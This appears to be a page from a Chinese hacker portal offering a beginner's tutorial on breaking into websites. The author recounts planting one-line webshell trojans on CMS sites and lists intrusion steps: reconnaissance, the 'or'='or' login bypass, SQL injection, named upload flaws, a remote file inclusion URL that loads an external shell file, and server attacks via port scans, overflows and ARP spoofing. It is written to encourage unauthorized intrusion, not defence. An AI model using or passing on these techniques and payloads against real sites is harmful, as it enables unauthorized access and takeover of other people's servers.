您现在的位置: 主页 > QQ黑客资讯 > QQ病毒专杀 > 文章内容

如何入侵网站此教程献给初学黑客的朋友

作者: 黑客联盟 来源:未知 时间: 2020-05-08 阅读:

黑客QQ www.hack85.com如何入侵网站此教程献给初学黑客的朋友 这个问题该从何说起呢?从网站漏洞说起?从入侵思路说起?有的朋友认为,入侵只要弄懂方法就行了,其他的不重要。那你就错了,经验是从实战中累积的,而不是靠凭空想象。我举个例子:一次我在入侵个风迅3.1CMS的时候,下数据库,进了后台,不知道怎么拿shell了。网上找教程都说的上传图片木马改后缀为asp或者添加模板插入木马代码。可是,这些功能都被管理员禁用了,左思右想之后还是没办法。第二天,拿掉个动易的站,方法是后台发表文章那里插入一句话木马,生成asp文件。然后连接就搞定了。忽然想到那个风迅后台好象也一样的。于是把那站重新看了遍,结果和动易一样的,顺利拿下了。这个例子说明,入侵不老死学别人的方法,看别人做的教程,很多还是要自己经常实战,思考,积累。以前,菜鸟们用明小子,啊D黑站。但渐渐发现这些黑客工具只能做普通的检测,而遇到大站时就束手无策了。有人说用旁注,从服务器入手,用CAIN嗅探。当然,这些方法都是可行的。不过更重要的还是自己的真材实学,比如你会网络编程,了解数据库,了解网络各种协议等等,即使你不是黑客,也能随时客串黑客。 我总结了下,入侵网站步骤: 1. 扫描获取网站信息 扫描包括:扫描后台地址,上传文件,数据库。或者从google寻找信息,搜索site:www.xxx.com (这只是初步的) 2. 寻找漏洞获得网站权限(webshell) 后台漏洞:默认管理密码,下载数据库,'or'='or'登陆,注入获得用户密码。 上传漏洞:动网上传漏洞,乔客上传漏洞,动力上传漏洞等。大概就是诸如:upfile.asp / up.asp之类的文件。 SQL漏洞:SA权限,db_owner权限,利用方法后面文章会给大家介绍。 远程包含漏洞:主要针对PHP程序。比如:http://www.xxx.com/streamline-1.0-beta4/src/core/theme/includes/account_footer.php?sl_theme_unix_path=http://www.xxx.com/shell.txt? 在网站中包含一个木马,可获得网站权限。 XSS漏洞:利用方法我也没试过,百度里找。 3. 入侵服务器拿站。 这个方法可以说比较难。用扫描工具扫服务器端口,看哪些端口可以利用,再进一步渗透。服务器操作系统溢出漏洞,windows 2000 / 2003 , Linux溢出。突破路由防火墙拦截。拿同IP段服务器,进行ARP欺骗等等。文章来自 www.hack85.com QQ黑客门户网站